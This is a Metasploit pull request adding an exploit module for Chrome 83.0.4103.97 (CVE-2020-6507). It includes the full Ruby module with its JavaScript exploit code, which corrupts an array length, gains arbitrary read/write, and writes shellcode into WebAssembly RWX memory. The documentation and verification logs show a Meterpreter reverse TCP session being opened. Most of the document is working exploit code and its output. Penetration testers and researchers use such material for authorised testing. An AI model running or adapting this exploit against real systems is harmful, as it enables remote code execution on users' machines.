### PR TITLE
Add exploit for Chrome version 83.0.4103.97

### DIFF
--- a/documentation/modules/exploit/multi/browser/chrome_newfixedarray_sizecheck.md
+++ b/documentation/modules/exploit/multi/browser/chrome_newfixedarray_sizecheck.md
@@ -1,0 +1,55 @@
+This module exploits an issue in Google Chrome 83.0.4103.97 (64 bit). The exploit makes use of a missing size check in NewFixedArray and abuses it to create a JSArray with an invalid length. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
+The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+
+**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 83 or less) on macOS and Linux, however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://chromium.cypress.io/linux/stable/83.0.4103.97](https://chromium.cypress.io/linux/stable/83.0.4103.97)
+
+1. Do: ```use exploit/multi/browser/chrome_newfixedarray_sizecheck```
+2. Do: ```set URIPATH / [PATH]```
+3. Do: ```set LHOST [IP]```
+4. Do: ```set SRVHOST [IP]```
+5. Do: ```exploit```
+
+## Scenarios
+
+### Ubuntu 18.04 and Google Chrome 83.0.4103.97 with --no-sandbox
+Start Google Chrome without a sandbox:
+```➜  ~ google-chrome-stable --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_newfixedarray_sizecheck 
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set srvport 80
+srvport => 80
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set uripath /
+uripath => /
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set srvhost 127.0.0.1
+srvhost => 127.0.0.1
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set lhost 127.0.0.1
+lhost => 127.0.0.1
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > [*] Using URL: http://127.0.0.1:80/
+[*] Server started.
+[*] 127.0.0.1        chrome_newfixedarray_sizecheck - Sending /index.html to Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4157.0 Safari/537.36
+[*] Sending stage (3012516 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44046) at 2020-10-22 16:33:05 +0530
+
+msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid 
+Server username: no-user @ ubuntu (uid=0, gid=0, euid=0, egid=0)
+```

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -136,10 +136,8 @@ function searchmem_full(value)
 var arraybuf_idx = searchmem(0x13373n);
 if(arraybuf_idx == -1)
 {
-	alert('Failed 1');
 	throw new Error("Not found");
 }
-document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>");
 function arb_read(addr, length)
 {
 	var data = [];
@@ -166,7 +164,6 @@ if (idx == -1)
 }
 
 wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
-document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");
 rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
 rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
 if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
@@ -174,7 +171,6 @@ if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
 	rwx_addr >>= 32n;
 	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
 }
-document.write("rwx addr: 0x"+rwx_addr.toString(16));
 arb_write(rwx_addr, shellcode);
 shell();
 ^

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -100,67 +100,67 @@ corrupted_array = trigger(giant_array)[1];
 var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];
 function searchmem(value)
 {
-	skip = 0;
-	for(i=0; i<search_space.length; ++i)
-	{
-		for(j=search_space[i][0];j<search_space[i][1];++j)
-		{
-			if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
-			{
-				if(skip++ == 2) // Probably the first two are due to the search itself
-					return j;
-			}
-		}
-	}
-	return -1;
+        skip = 0;
+        for(i=0; i<search_space.length; ++i)
+        {
+                for(j=search_space[i][0];j<search_space[i][1];++j)
+                {
+                        if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
+                        {
+                                if(skip++ == 2) // Probably the first two are due to the search itself
+                                        return j;
+                        }
+                }
+        }
+        return -1;
 }
 
 function searchmem_full(value)
 {
-	for(i=0;i<search_space.length;++i)
-	{
-		for(j=search_space[i][0];j<search_space[i][1];++j)
-		{
-			if((ftoi(corrupted_array[j]) === value))
-			{
-				if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
-				{
-					return j;
-				}
-			}
-		}
-	}
-	return -1;
+        for(i=0;i<search_space.length;++i)
+        {
+                for(j=search_space[i][0];j<search_space[i][1];++j)
+                {
+                        if((ftoi(corrupted_array[j]) === value))
+                        {
+                                if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
+                                {
+                                        return j;
+                                }
+                        }
+                }
+        }
+        return -1;
 }
 
 var arraybuf_idx = searchmem(0x13373n);
 if(arraybuf_idx == -1)
 {
-	throw new Error("Not found");
+        throw new Error("Not found");
 }
 function arb_read(addr, length)
 {
-	var data = [];
-	let u8_arraybuf = new Uint8Array(arraybuf);
-	corrupted_array[arraybuf_idx+1] = itof(addr);
-	for(i=0;i<data.length;++i)
-		data.push(u8_arraybuf[i]);
-	return data;
+        var data = [];
+        let u8_arraybuf = new Uint8Array(arraybuf);
+        corrupted_array[arraybuf_idx+1] = itof(addr);
+        for(i=0;i<data.length;++i)
+                data.push(u8_arraybuf[i]);
+        return data;
 }
 
 function arb_write(addr, data)
 {
-	corrupted_array[arraybuf_idx+1] = itof(addr);
-	let u8_arraybuf = new Uint8Array(arraybuf);
-	for(i=0;i<data.length;++i)
-		u8_arraybuf[i] = data[i];
+        corrupted_array[arraybuf_idx+1] = itof(addr);
+        let u8_arraybuf = new Uint8Array(arraybuf);
+        for(i=0;i<data.length;++i)
+                u8_arraybuf[i] = data[i];
 }
 
 idx = searchmem_full((1337332n << 33n) + (1337331n << 1n));
 if (idx == -1)
 {
-	alert('Failed 2');
-	throw new Error("Not found");
+        alert('Failed 2');
+        throw new Error("Not found");
 }
 
 wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
@@ -168,8 +168,8 @@ rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
 rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
 if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
 {
-	rwx_addr >>= 32n;
-	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+        rwx_addr >>= 32n;
+        rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
 }
 arb_write(rwx_addr, shellcode);
 shell();

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -69,9 +69,9 @@ function itof(val) {
 }
 
 function gc() {
-	for (let i = 0; i < 100; i++) {
-		new ArrayBuffer(0x100000);
-	}
+    for (let i = 0; i < 100; i++) {
+        new ArrayBuffer(0x100000);
+    }
 }
 
 array = Array(0x40000).fill(1.1);

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -1,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 83 Missing size check in NewFixedArray',
+      'Description'    => %q{
+      This module exploits an issue in Google Chrome 83.0.4103.97 (64 bit). The exploit
+      makes use of a missing size check in NewFixedArray and abuses it to create a
+      JSArray with an invalid length. This is abused to gain arbitrary read/write into
+      the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary
+      read/write.
+      The exploit then uses WebAssembly in order to allocate a region of RWX memory,
+      which is then replaced with the payload shellcode.
+      The payload is executed within the sandboxed renderer process, so the browser
+      must be run with the --no-sandbox option for the payload to work correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Sergei Glazunov', # discovery
+          'Rajvardhan Agarwal (r4j)', # exploit
+        ],
+      'References'     => [
+          ['URL', 'https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-exploit'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'DefaultTarget'  => 0,
+      'Targets'        =>
+        [
+          ['Linux - Google Chrome 83.0.4103.97 (64 bit)', {'Platform' => 'linux'}],
+        ],
+      'DisclosureDate' => 'Aug 25 2020'))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '')
+    jscript = %Q^
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+
+var arraybuf = new ArrayBuffer(0x13373);
+var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]);
+var mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(mod);
+var shell = wasm_instance.exports.shell;
+var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337];
+
+var shellcode = new Uint8Array([#{js_payload}]);
+
+function ftoi(val) {
+         f64_buf[0] = val;
+         return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+function itof(val) {
+         u64_buf[0] = Number(val & 0xffffffffn);
+         u64_buf[1] = Number(val >> 32n);
+         return f64_buf[0];
+}
+
+array = Array(0x40000).fill(1.1);
+args = Array(0x100 - 1).fill(array);
+args.push(Array(0x40000 - 4).fill(2.2));
+giant_array = Array.prototype.concat.apply([], args);
+giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
+
+length_as_double =
+    new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0];
+
+function trigger(array) {
+  var x = array.length;
+  x -= 67108861;
+  x = Math.max(x, 0);
+  x *= 6;
+  x -= 5;
+  x = Math.max(x, 0);
+
+  let corrupting_array = [0.1, 0.1];
+  let corrupted_array = [0.1];
+
+  corrupting_array[x] = length_as_double;
+  return [corrupting_array, corrupted_array];
+}
+
+for (let i = 0; i < 30000; ++i) {
+  trigger(giant_array);
+}
+corrupted_array = trigger(giant_array)[1];
+
+var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];
+function searchmem(value)
+{
+	skip = 0;
+	for(i=0; i<search_space.length; ++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
+			{
+				if(skip++ == 2) // Probably the first two are due to the search itself
+					return j;
+			}
+		}
+	}
+	return -1;
+}
+
+function searchmem_full(value)
+{
+	for(i=0;i<search_space.length;++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if((ftoi(corrupted_array[j]) === value))
+			{
+				if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
+				{
+					return j;
+				}
+			}
+		}
+	}
+	return -1;
+}
+
+var arraybuf_idx = searchmem(0x13373n);
+if(arraybuf_idx == -1)
+{
+	alert('Failed 1');
+	throw new Error("Not found");
+}
+document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>");
+function arb_read(addr, length)
+{
+	var data = [];
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	for(i=0;i<data.length;++i)
+		data.push(u8_arraybuf[i]);
+	return data;
+}
+
+function arb_write(addr, data)
+{
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	for(i=0;i<data.length;++i)
+		u8_arraybuf[i] = data[i];
+}
+
+idx = searchmem_full((1337332n << 33n) + (1337331n << 1n));
+if (idx == -1)
+{
+	alert('Failed 2');
+	throw new Error("Not found");
+}
+
+wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
+document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");
+rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
+rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
+if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
+{
+	rwx_addr >>= 32n;
+	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+}
+document.write("rwx addr: 0x"+rwx_addr.toString(16));
+arb_write(rwx_addr, shellcode);
+shell();
+^
+
+    html = %Q^
+<html>
+<head>
+<script>
+#{jscript}
+</script>
+</head>
+<body>
+</body>
+</html>
+    ^
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+  end
+
+end

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -68,6 +68,12 @@ function itof(val) {
          return f64_buf[0];
 }
 
+function gc() {
+	for (let i = 0; i < 100; i++) {
+		new ArrayBuffer(0x100000);
+	}
+}
+
 array = Array(0x40000).fill(1.1);
 args = Array(0x100 - 1).fill(array);
 args.push(Array(0x40000 - 4).fill(2.2));
@@ -95,6 +101,8 @@ function trigger(array) {
 for (let i = 0; i < 30000; ++i) {
   trigger(giant_array);
 }
+gc();
+
 corrupted_array = trigger(giant_array)[1];
 
 var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Rajvardhan Agarwal (r4j)', # exploit
         ],
       'References'     => [
+          ['CVE', '2020-6507'],
           ['URL', 'https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974'],
           ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-exploit'],
         ],

--- a/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
+++ b/modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
-    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '')
+    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/,'')
     jscript = %Q^
 var buf = new ArrayBuffer(8);
 var f64_buf = new Float64Array(buf);


### PR DESCRIPTION
## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_newfixedarray_sizecheck`
- [ ] `set uripath /`
- [ ] `set lhost 127.0.0.1`
- [ ] `set srvhost 127.0.0.1`
- [ ] `exploit`
- [ ] Visit the URL with Chrome
- [ ] **Verify** you get a meterpreter shell.

e.g:
```
msf5 > use exploit/multi/browser/chrome_newfixedarray_sizecheck 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set uripath /
uripath => /
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > [*] Using URL: http://127.0.0.1:8080/
[*] Server started.
[*] 127.0.0.1        chrome_newfixedarray_sizecheck - Sending / to Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
[*] Sending stage (3012516 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:35280) at 2020-08-27 19:23:10 +0530
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: no-user @ kali (uid=0, gid=0, euid=0, egid=0)
```